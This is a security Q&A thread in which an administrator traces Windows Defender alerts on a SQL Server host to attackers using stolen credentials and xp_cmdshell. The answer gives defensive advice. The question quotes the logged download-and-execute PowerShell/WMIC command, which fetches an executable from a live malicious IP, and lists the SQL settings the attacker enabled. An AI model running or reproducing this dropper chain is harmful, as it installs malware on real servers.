# How to find the process that is running PowerShell commands that appear in Windows Defender

Tags: sql-server, trojan, windows-server, powershell

On one of our Windows Datacenter 2016, there's an alert that a trojan is trying to install :
[image]

The following PowerShell commands are trying to execute at seemingly random hours of the day (always during working hours, one to two times a day, sometimes there are a few days between attempts which makes me think it's embedded in a file that is executed by the users of the machine)

```
CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, %TEMP%\tzt.exe) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create %TEMP%\tzt.exe
CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe) >> C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & WMIC process call create C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe
```

So I suppose it's embedded in some kind of other files, or through a network attack, but I don't know how to investigate this to know which service/file is faulty.

Edit :

I checked into the event viewer : system logs and the detections hours by windows defender coincides with the service : App deployment services starting

```
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
  <Provider Name="Service Control Manager" Guid="{xxx-a6d7-4695-8e1e-xxx012f4}" EventSourceName="Service Control Manager" /> 
  <EventID Qualifiers="16384">7036</EventID> 
  <Version>0</Version> 
  <Level>4</Level> 
  <Task>0</Task> 
  <Opcode>0</Opcode> 
  <Keywords>0x8080000000000000</Keywords> 
  <TimeCreated SystemTime="2023-03-03T13:36:51.390130000Z" /> 
  <EventRecordID>685207</EventRecordID> 
  <Correlation /> 
  <Execution ProcessID="708" ThreadID="13796" /> 
  <Channel>System</Channel> 
  <Computer>xxxx</Computer> 
  <Security /> 
  </System>
- <EventData>
  <Data Name="param1">AppX Deployment Service (AppXSVC)</Data> 
  <Data Name="param2">running</Data> 
  <Binary>4100700070005800xx4000000</Binary> 
  </EventData>
  </Event>
```

In the event viewer > Windows logs > Application I found that the following values are changed at the time Windows defender is triggered :

- TRUSTWORTHY new value ON for database msdb
- 'clr enabled' new value : 1
- 'show advanced options' new value : 1
- ''xp_cmdshell' new value : 1

Comming from user : MSSQL$SAGE100 which is a the sys sql user

[image]

So i suppose the user has been compromised and is used to try to issue powershell commands to the vm, I have enabled the logging for successful logins on the sql server to see if the commands are issued through an application or directly from the network.

After another attack yesterday I can confirm that someone is logging from outside with the correct credentials for an sql user of my sql server and uses this user to conduct the attack.

Comment: Have you checked the task scheduler?

Comment: @AustereGrim yes I can't see anything weird, also since the execution hours looks a bit random i'm not sure it's a schedule task.

Comment: Defender doesn't offer more info?

Comment: I'm not sure this can be answered in a Q&A site. This requires some forensic analysis.

Comment: What about the windows logs ?

Comment: @schroeder Nope, no more informations, I was more looking for general guidelines of where to look and what to check (IE : windows event logs)

Comment: @elsadek I could not check all the logs but in the system event viewer i saw that the one event that occurs at the same time the command is detected by windows defender is appxsvc entering running state

Comment: @Maxime I would start checking SAGE100 and its service for any vulnerability or patches that are not applied in your environment yet.

Answer (score 0):

I speculate that your attacker is using the stolen credentials to run `xp_cmdshell`, giving it the command lines you've shown in your question. (Ed. depending on who owned these creds originally, you might need to have a chat.)

Depending on how you're using it, you could get rid of `xp_cmdshell` all together. You could also [restrict which users have access to `xp_cmdshell`](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql), [limit the capability of `xp_cmdshell` by running it under a standard windows user account](https://sqland.wordpress.com/2018/10/11/allow-a-user-to-execute-xp_cmdshell-without-being-a-sysadmin/) *ELopes'18*, and also [enable auditing of `xp_cmdshell` calls](https://www.patrickkeisler.com/2018/07/sql-server-audit-recipe-xpcmdshell.html) *PKeisler'18*.

I ran *VirusTotal* on the http linked exe, and surprise (!!), [it's considered malicious by over 1/4 of scanners](https://www.virustotal.com/gui/url/cb274c06ffde366ac789c3e6e7ccecb9a3713879584d3724333c6a9bf2a29f40/detection) `o:` (... on a side note, [it forced *HybridAnalysis* into apoplexy](https://www.hybrid-analysis.com/sample/a3b92d9cb675122b60a22b2c9a8564b4052446c4deae0c6d7b40eec31a495b26) so it must've been something yummy!)

Anyway, it looks like *Windows Defender* is doing its job, which is a plus. (In my experience it will freak out over a single entry in *VirusTotal*, as recently happened with one of the [*SysinternalSuite* tools](https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite), which may also be useful to you - as suggested in the comments, be sure to take this host offline and go over it with a fine-toothed comb - `autoruns.exe` can help here.)

I would also be very concerned about the ability for this backend database to connect willy-nilly to some [blacklisted host on the internet](https://mxtoolbox.com/SuperTool.aspx?action=blacklist%3a80.66.75.36&run=toolpage), ie. something somewhere is asking nicely for this box to ...

> *"HEY COMRADE! download totally benign `exe` file and run him - let me know when finished, da?"*
> *... signed, legit user*

(Consider introducing firewalling based on listed ip addresses through a separate mechanism - feel free to ask another q and describe your environment a bit more for a decent answer on this topic.)